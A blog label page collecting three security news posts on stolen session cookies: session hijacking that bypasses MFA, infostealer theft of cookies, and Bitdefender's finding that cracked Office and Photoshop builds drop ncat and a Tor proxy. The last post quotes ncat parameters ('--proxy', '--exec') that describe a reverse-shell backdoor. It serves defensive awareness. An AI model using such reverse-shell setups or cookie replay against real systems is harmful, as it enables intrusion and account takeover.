Search This Blog

Powered by Blogger.

Blog Archive

Labels

Showing posts with label session cookies. Show all posts

Session Hijacking Surges: Attackers Exploit MFA Gaps with Modern Tactics

 

As multi-factor authentication (MFA) becomes more common, attackers are increasingly resorting to session hijacking. Evidence from 2023 shows this trend: Microsoft detected 147,000 token replay attacks, marking a 111% increase year-over-year. Google reports that attacks on session cookies now rival traditional password-based threats.

Session hijacking has evolved from old Man-in-the-Middle (MitM) attacks, which relied on intercepting unsecured network traffic. Today, these attacks are internet-based, focusing on cloud apps and services. Modern session hijacking involves stealing session materials like cookies and tokens, enabling attackers to bypass standard security controls like VPNs, encrypted traffic, and even MFA.

The rise of identity-based attacks is a result of the growing complexity of user accounts, with each person managing multiple cloud-based services. Once attackers gain access to an active session, they can bypass MFA, leveraging the valid session tokens, which often stay active longer than expected.

Modern phishing toolkits, like AitM and BitM, make hijacking easier by allowing attackers to intercept MFA processes or trick users into controlling their browser. Infostealers, a newer tool, capture session cookies from the victim’s browser, putting multiple applications at risk, especially when EDR systems fail to detect them.

Infostealer infections are often traced back to unmanaged personal devices, which sync browser profiles with work devices, leading to the compromise of corporate credentials. EDRs aren’t always reliable in stopping these threats, and attackers can still resume stolen sessions without re-authentication, making it difficult for organizations to detect unauthorized access.

Passkeys offer some protection by preventing phishing, but infostealers bypass authentication entirely. While app-level controls exist to detect unauthorized sessions, many are inadequate. Companies are now considering browser-based solutions that monitor user agent strings for signs of session hijacking, offering a last line of defense against these sophisticated attacks.

Stolen Session Cookies Turns Into the Next Cyber Threat


According to the recent Identity Exposure Report by SpyCloud, 87,000 credentials linked to Fortune 1000 C-level executives were recovered from the criminal underworld, in year 2022. Security leaders across organizations continue to live in constant terror of becoming a victim of a cyberattack and for good reason.

Cybercriminals can access networks and commit crimes including fraud, session hijacking, account takeover, and attacks with ransomware using exposed assets, such as usernames and passwords. Even though companies focus on enhancing their security tactics, like adding user authentication such as multifactor authentication and passkeys, criminals too put efforts into constantly being better in their crimes to bypass these high-end security barriers. One such method used commonly by threat actors includes using stolen active session cookies to commit session hijacking, which defeats the effectiveness of the conventionally employed safeguards.

In order to better their network defense and safeguard their customers, organizations and security experts must have a better understanding of the criminals’ methodologies to commit cybercrimes, like how they utilized stolen data for their profit.

Session Cookies 

Session cookies are present all over the online space, from websites to applications that assign a cookie or token to identify their users. The series of characters used in the process is further stored on the device, making re-access easier for the user. 

While this function provides personalized and smooth experience to users, this could be harmful if the data falls into the wrong hands. Using infostealer malware, cybercriminals can exfiltrate cookies and a variety of other data types from infected computers and implant them into browsers that cannot be easily detected, giving them the ability to pose as authentic users in a process known as session hijacking.

Impersonating as a legit user, a threat actor can thus freely navigate over the network committing fraud, helping a ransomware attack, stealing important company data, and more. No matter how the user signed in—using a username and password, a passkey, or by successfully completing the multifactor authentication (MFA) requirements—a session cookie will still confirm the user's identity.

Due to its difficult-to-detect nature, low cost of acquisition (normally available online for only a few dollars online/month), and regular success in stealing cookies and other recent, high-quality data has made infostealer quality soar. 

Protecting Businesses and Their Customers

According to SpyCloud data, cookie theft by cyber thieves is already fairly frequent, with over 22 billion device and session cookie records seized by criminals last year. This entry point will expand because fraudsters are having great success accessing accounts and businesses via these cookies. For organizations trying to preserve their bottom line, having a strategy to proactively disrupt criminal operations is a vital requirement.

The recently developed malwares are difficult to be detected, considering their well-crafted designs. Common infostealers frequently leave little to no evidence of infection on the victim's device and exfiltrate sensitive data in a matter of seconds.

However, there are certain measures organizations can adopt in order to evade any risk from this malware as listed below: 

  • Educating employees about these threats has become crucial. Employees can alone reduce total malware exposure by identifying phishing attempts, exercising caution while using unmanaged or poorly maintained devices to access corporate systems and networks, not sharing passwords, and being aware of potentially harmful email attachments, websites, and downloads.
  • The risk of session hijacking is decreased by removing "remember me" settings on platform login pages and regularly eliminating browser cookies, ensuring that thieves can't access active session cookies even in the event of malware infection. 
  • Security teams can obtain a comprehensive understanding of the compromised devices and data threatening their firms by using darknet data that has been ingested, vetted, and evaluated. Teams can invalidate open session cookies, reset the exposed application information, and patch any remaining vulnerabilities with this insight. By addressing the threat of stolen data before it escalates into a full-blown security issue, this strategy lessens the harm to enterprises.  

Cracked Version of few Software Steal Session Cookies and Monero Cryptocurrency

 

Bitdefender which is a Romania-based cybersecurity organization located in Bucharest has recently cautioned that cracked versions of Microsoft Office and Adobe Photoshop steal the browser session cookies along with Monero cryptocurrency and carry them back from tightwads installing pirated apps. 

While most readers would be familiar, that cracked software is a genuine application that has removed its registration or licensing features. In the days of yore, the cracked software (also known as warez) mainly exchanged through BitTorrent and mostly attracted the freeloaders who enjoyed using a specific suite without paying for the License. 

However, these cracks are priced differently: Bitdefender observed that some versions of both suites have been circulated with malware that captures browser session cookies (or in Firefox, the complete user profile history). It hijacked Monero cryptocurrency deposits and exfiltrated certain information using BitTorrent, after opening the backdoor in the first instance and disabling the machine's firewall. 


"Once executed, the crack drops an instance of ncat.exe (a legitimate tool to send raw data over the network) as well as a Tor proxy," said Bitdefender's Bogdan Botezatu, director of threat research and reporting, and Eduard Budaca the security researcher. They further added that "The tools work together to create a powerful backdoor that communicates through TOR with its command-and-control center: the ncat binary uses the listening port of the TOR proxy ('--proxy 127.0.0.1:9075') and uses the standard '--exec' parameter, which allows all input from the client to be sent to the application and responses to be sent back to the client over the socket (reverse shell behavior)." 


Reportedly, operators take a while to analyze and determine that whether they should rob what they have compromised or not – depending upon the estimated value they could gain out of it. 

In the days when business models became feasible as a service in the cloud, vendors were fully dependent on physical media for delivering to end-users that included the whole program; Immediate and common targets for crackers were copying protections which resulted in unlawful copies of otherwise fully functioning software being sold at a much lower cost. 

“Pirated software is never the way to go, however tempting it may be, as the risks tend to always outweigh the benefits,” sources further noted.